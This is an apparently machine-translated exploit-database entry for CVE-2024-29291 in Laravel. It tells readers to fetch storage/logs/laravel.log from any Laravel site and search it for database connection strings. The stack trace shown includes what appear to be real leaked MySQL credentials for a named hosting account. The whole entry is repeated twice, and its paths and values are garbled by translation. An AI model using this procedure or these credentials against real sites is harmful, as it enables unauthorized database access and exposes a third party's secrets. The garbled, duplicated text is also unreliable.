#利用标题: Laravel框架11-凭证泄漏
#Google Dork: N/A
#日期: [2024-04-19]
#利用作者: Huseein Amer
#供应商homepage: [https://laravel.com/]
#软件link: n/a
#版本: 8.* - 11.*(必需)
#测试在: [n/a]
#CVE : CVE-2024-29291
概念证明:
转到任何基于Laravel的网站,然后导航到存储/日志/Laravel.log。
打开文件并搜索'pdo -__ construct('MySQL:Host='。
结果:
壳
复制代码
#0
/HOME/U429384055/DOMAINS/JS-CVDOCS.ONLINE/public_html/vendor/laravel/laravel/framework/src/illuminate/database/database/connectors/connector.ponnector.php(70):
PDO -__构造('mysql:host=sql1 .','u429384055_jscv','jaly $$ $$ a0p0p0p0',
大批)
#1
/HOME/U429384055/DOMAINS/JS-CVDOCS.ONLINE/public_html/vendor/laravel/laravel/framework/src/illuminate/database/database/connectors/connector.php(46):
照明\ database \ connectors \ connector-createpdoconnection('mysql:host=sql1 .',
'u429384055_jscv','jaly $$ a0p0p0p0',数组)
凭证:
USERNAME: U429384055_JSCV
密码: JALY $$ A0P0P0P0
HOST: SQL1 .
#Google Dork: N/A
#日期: [2024-04-19]
#利用作者: Huseein Amer
#供应商homepage: [https://laravel.com/]
#软件link: n/a
#版本: 8.* - 11.*(必需)
#测试在: [n/a]
#CVE : CVE-2024-29291
概念证明:
转到任何基于Laravel的网站,然后导航到存储/日志/Laravel.log。
打开文件并搜索'pdo -__ construct('MySQL:Host='。
结果:
壳
复制代码
#0
/HOME/U429384055/DOMAINS/JS-CVDOCS.ONLINE/public_html/vendor/laravel/laravel/framework/src/illuminate/database/database/connectors/connector.ponnector.php(70):
PDO -__构造('mysql:host=sql1 .','u429384055_jscv','jaly $$ $$ a0p0p0p0',
大批)
#1
/HOME/U429384055/DOMAINS/JS-CVDOCS.ONLINE/public_html/vendor/laravel/laravel/framework/src/illuminate/database/database/connectors/connector.php(46):
照明\ database \ connectors \ connector-createpdoconnection('mysql:host=sql1 .',
'u429384055_jscv','jaly $$ a0p0p0p0',数组)
凭证:
USERNAME: U429384055_JSCV
密码: JALY $$ A0P0P0P0
HOST: SQL1 .